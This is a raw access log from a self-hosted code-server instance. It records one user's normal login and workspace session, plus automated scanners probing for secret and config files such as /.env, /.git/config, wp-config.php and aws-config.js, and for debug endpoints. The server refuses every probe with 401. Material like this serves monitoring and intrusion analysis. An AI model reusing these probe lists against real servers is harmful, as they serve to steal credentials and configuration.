[Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:23:41:48 +0000] - 401 401 - GET https code.profibot.hu "/css/support_parent.css" [Client 84.254.106.197] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:23:41:48 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-512.png" [Client 84.254.106.197] [Length 8489] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:23:41:48 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 84.254.106.197] [Length 3276] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:23:41:48 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 84.254.106.197] [Length 4226] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[21/Jan/2026:00:55:50 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 23.27.145.183] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[21/Jan/2026:00:55:50 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 23.27.145.183] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[21/Jan/2026:01:09:48 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 54.146.4.41] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0" "-" +[21/Jan/2026:01:09:48 +0000] - 200 200 - POST https code.profibot.hu "/login" [Client 54.146.4.41] [Length 1051] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0" "-" +[21/Jan/2026:01:33:12 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 195.178.110.54] [Length 29] [Gzip -] [Sent-to code-server] "SonyEricssonW995/R1EA Profile/MIDP-2.1 Configuration/CLDC-1.1 UNTRUSTED/1.0" "-" +[21/Jan/2026:03:53:57 +0000] - 302 302 - GET http code.profibot.hu "/" [Client 188.215.235.41] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36" "-" +[21/Jan/2026:03:56:15 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 45.139.104.168] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0" "-" +[21/Jan/2026:04:12:59 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 3.93.17.35] [Length 29] [Gzip -] [Sent-to code-server] "okhttp/5.3.0" "-" +[21/Jan/2026:04:12:59 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 3.93.17.35] [Length 1038] [Gzip -] [Sent-to code-server] "okhttp/5.3.0" "-" +[21/Jan/2026:04:12:59 +0000] - 401 401 - GET https code.profibot.hu "/favicon.ico" [Client 3.93.17.35] [Length 24] [Gzip -] [Sent-to code-server] "okhttp/5.3.0" "-" +[21/Jan/2026:04:12:59 +0000] - 401 401 - GET https code.profibot.hu "/favicon.png" [Client 3.93.17.35] [Length 24] [Gzip -] [Sent-to code-server] "okhttp/5.3.0" "-" +[21/Jan/2026:04:12:59 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/favicon-dark-support.svg" [Client 3.93.17.35] [Length 685] [Gzip -] [Sent-to code-server] "okhttp/5.3.0" "-" +[21/Jan/2026:04:12:59 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 3.93.17.35] [Length 4231] [Gzip -] [Sent-to code-server] "okhttp/5.3.0" "-" +[21/Jan/2026:04:13:00 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 3.93.17.35] [Length 3276] [Gzip -] [Sent-to code-server] "okhttp/5.3.0" "-" +[21/Jan/2026:04:13:00 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-512.png" [Client 3.93.17.35] [Length 8489] [Gzip -] [Sent-to code-server] "okhttp/5.3.0" "-" +[21/Jan/2026:04:36:15 +0000] - 401 401 - GET http code.profibot.hu "/wp-login.php" [Client 206.81.17.180] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0" "-" +[21/Jan/2026:04:39:48 +0000] - 302 302 - GET http code.profibot.hu "/" [Client 35.240.245.118] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 12) Chrome/111.0 Mobile Safari/537.36" "-" +[21/Jan/2026:04:39:49 +0000] - 200 200 - GET http code.profibot.hu "/login" [Client 35.240.245.118] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 12) Chrome/111.0 Mobile Safari/537.36" "-" +[21/Jan/2026:04:39:49 +0000] - 401 401 - GET http code.profibot.hu "/wordpress/" [Client 35.240.245.118] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) Firefox/117.0" "-" +[21/Jan/2026:04:45:09 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 149.57.180.113] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[21/Jan/2026:04:45:09 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 149.57.180.113] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[21/Jan/2026:06:08:18 +0000] - 401 401 - GET https code.profibot.hu "/.git/config" [Client 93.123.109.175] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0" "-" +[21/Jan/2026:06:46:28 +0000] - 401 401 - POST https code.profibot.hu "/" [Client 85.11.167.4] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://code.profibot.hu" +[21/Jan/2026:06:46:28 +0000] - 401 401 - POST https code.profibot.hu "/" [Client 85.11.167.4] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://code.profibot.hu" +[21/Jan/2026:07:09:58 +0000] - 302 302 - GET http code.profibot.hu "/" [Client 209.38.231.81] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[21/Jan/2026:07:09:58 +0000] - 200 200 - GET http code.profibot.hu "/login" [Client 209.38.231.81] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[21/Jan/2026:07:09:59 +0000] - 200 200 - GET http code.profibot.hu "/_static/src/browser/media/favicon-dark-support.svg" [Client 209.38.231.81] [Length 685] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "http://code.profibot.hu/login" +[21/Jan/2026:07:09:59 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 209.38.231.81] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-" +[21/Jan/2026:07:10:00 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 209.38.231.81] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-" +[21/Jan/2026:07:10:00 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/media/favicon-dark-support.svg" [Client 209.38.231.81] [Length 685] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "https://code.profibot.hu/login" +[21/Jan/2026:07:14:01 +0000] - 401 401 - GET https code.profibot.hu "/.git/config" [Client 45.148.10.238] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)" "-" +[21/Jan/2026:07:16:06 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 195.178.110.132] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[21/Jan/2026:07:16:06 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 195.178.110.132] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://code.profibot.hu" +[21/Jan/2026:07:16:06 +0000] - 401 401 - GET https code.profibot.hu "/.env" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[21/Jan/2026:07:16:06 +0000] - 401 401 - GET https code.profibot.hu "/.env" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[21/Jan/2026:07:16:06 +0000] - 401 401 - GET https code.profibot.hu "/.env.bak" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[21/Jan/2026:07:16:06 +0000] - 401 401 - GET https code.profibot.hu "/.env.save" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[21/Jan/2026:07:16:06 +0000] - 401 401 - GET https code.profibot.hu "/backend/.env" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" +[21/Jan/2026:07:16:06 +0000] - 401 401 - GET https code.profibot.hu "/admin/.env" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[21/Jan/2026:07:16:06 +0000] - 401 401 - GET https code.profibot.hu "/.git/config" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[21/Jan/2026:07:16:06 +0000] - 401 401 - GET https code.profibot.hu "/wp-config.php" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[21/Jan/2026:07:16:06 +0000] - 401 401 - GET https code.profibot.hu "/wp-config.php.old" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[21/Jan/2026:07:16:06 +0000] - 401 401 - GET https code.profibot.hu "/config.php" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[21/Jan/2026:07:16:06 +0000] - 401 401 - GET https code.profibot.hu "/config.php.bak" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" +[21/Jan/2026:07:16:06 +0000] - 401 401 - GET https code.profibot.hu "/config.js" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[21/Jan/2026:07:16:06 +0000] - 401 401 - GET https code.profibot.hu "/aws-config.js" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" +[21/Jan/2026:07:16:06 +0000] - 401 401 - GET https code.profibot.hu "/aws.config.js" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[21/Jan/2026:07:16:06 +0000] - 401 401 - GET https code.profibot.hu "/debug" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[21/Jan/2026:07:16:07 +0000] - 401 401 - GET https code.profibot.hu "/debug/vars" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[21/Jan/2026:07:16:07 +0000] - 401 401 - GET https code.profibot.hu "/debug/pprof" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[21/Jan/2026:07:16:07 +0000] - 401 401 - GET https code.profibot.hu "/_debug" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[21/Jan/2026:07:16:07 +0000] - 401 401 - GET https code.profibot.hu "/api/debug" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[21/Jan/2026:07:16:07 +0000] - 401 401 - GET https code.profibot.hu "/__debug__" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[21/Jan/2026:07:16:07 +0000] - 401 401 - GET https code.profibot.hu "/debug/default/view" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[21/Jan/2026:07:16:07 +0000] - 401 401 - GET https code.profibot.hu "/_profiler" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[21/Jan/2026:07:16:07 +0000] - 401 401 - GET https code.profibot.hu "/telescope" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[21/Jan/2026:07:16:07 +0000] - 401 401 - GET https code.profibot.hu "/_debugbar" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[21/Jan/2026:07:16:07 +0000] - 401 401 - GET https code.profibot.hu "/.git/HEAD" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[21/Jan/2026:07:16:07 +0000] - 401 401 - GET https code.profibot.hu "/.git/config" [Client 195.178.110.132] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" "-" +[21/Jan/2026:10:07:59 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 34.221.21.250] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" "-" +[21/Jan/2026:10:07:59 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 34.221.21.250] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" "https://code.profibot.hu" +[21/Jan/2026:10:07:59 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 34.221.21.250] [Length 296] [Gzip -] [Sent-to code-server] "Mozilla/5.0" "-" +[21/Jan/2026:11:17:05 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 84.1.26.27] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[21/Jan/2026:11:17:05 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 84.1.26.27] [Length 934] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[21/Jan/2026:11:17:05 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/pages/login.css" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[21/Jan/2026:11:17:05 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/pages/global.css" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[21/Jan/2026:11:17:06 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 84.1.26.27] [Length 291] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[21/Jan/2026:11:17:06 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[21/Jan/2026:11:17:06 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[21/Jan/2026:11:17:07 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[21/Jan/2026:11:17:13 +0000] - 302 302 - POST https code.profibot.hu "/login" [Client 84.1.26.27] [Length 31] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[21/Jan/2026:11:17:13 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 84.1.26.27] [Length 58] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[21/Jan/2026:11:17:13 +0000] - 200 200 - GET https code.profibot.hu "/?folder=/home/coder/project" [Client 84.1.26.27] [Length 1380] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[21/Jan/2026:11:17:14 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 84.1.26.27] [Length 291] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[21/Jan/2026:11:17:14 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[21/Jan/2026:11:17:14 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[21/Jan/2026:11:17:14 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vsda/rust/web/vsda_bg.wasm" [Client 84.1.26.27] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[21/Jan/2026:11:17:14 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vsda/rust/web/vsda.js" [Client 84.1.26.27] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[21/Jan/2026:11:17:15 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/services/extensions/worker/webWorkerExtensionHostIframe.html?&vscodeWebWorkerExtHostId=13272517-412b-46ee-97e0-cac4c1a8bd09" [Client 84.1.26.27] [Length 2196] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[21/Jan/2026:11:17:15 +0000] - 200 200 - GET https code.profibot.hu "/update/check" [Client 84.1.26.27] [Length 80] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[21/Jan/2026:11:17:17 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[21/Jan/2026:11:17:46 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[21/Jan/2026:11:42:18 +0000] - 401 401 - GET https code.profibot.hu "/.git/config" [Client 45.148.10.238] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0" "-" +[21/Jan/2026:11:46:17 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=94bb0b0e-2942-4dc1-8bdb-026f03a08f3b&reconnection=false&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 850738] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[21/Jan/2026:11:46:17 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=e7d111f3-3cd8-4f24-9ca0-9206acd1378a&reconnection=false&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 37186] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[21/Jan/2026:16:14:36 +0000] - 302 302 - GET http code.profibot.hu "/" [Client 136.115.155.33] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "-" +[21/Jan/2026:16:14:36 +0000] - 200 200 - GET http code.profibot.hu "/login" [Client 136.115.155.33] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "http://code.profibot.hu" +[21/Jan/2026:21:25:10 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 195.178.110.155] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0" "-" +[21/Jan/2026:21:38:45 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 45.148.10.99] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[21/Jan/2026:21:38:49 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 45.148.10.99] [Length 2621] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[21/Jan/2026:21:38:50 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 45.148.10.99] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[21/Jan/2026:21:38:57 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 45.148.10.99] [Length 2621] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 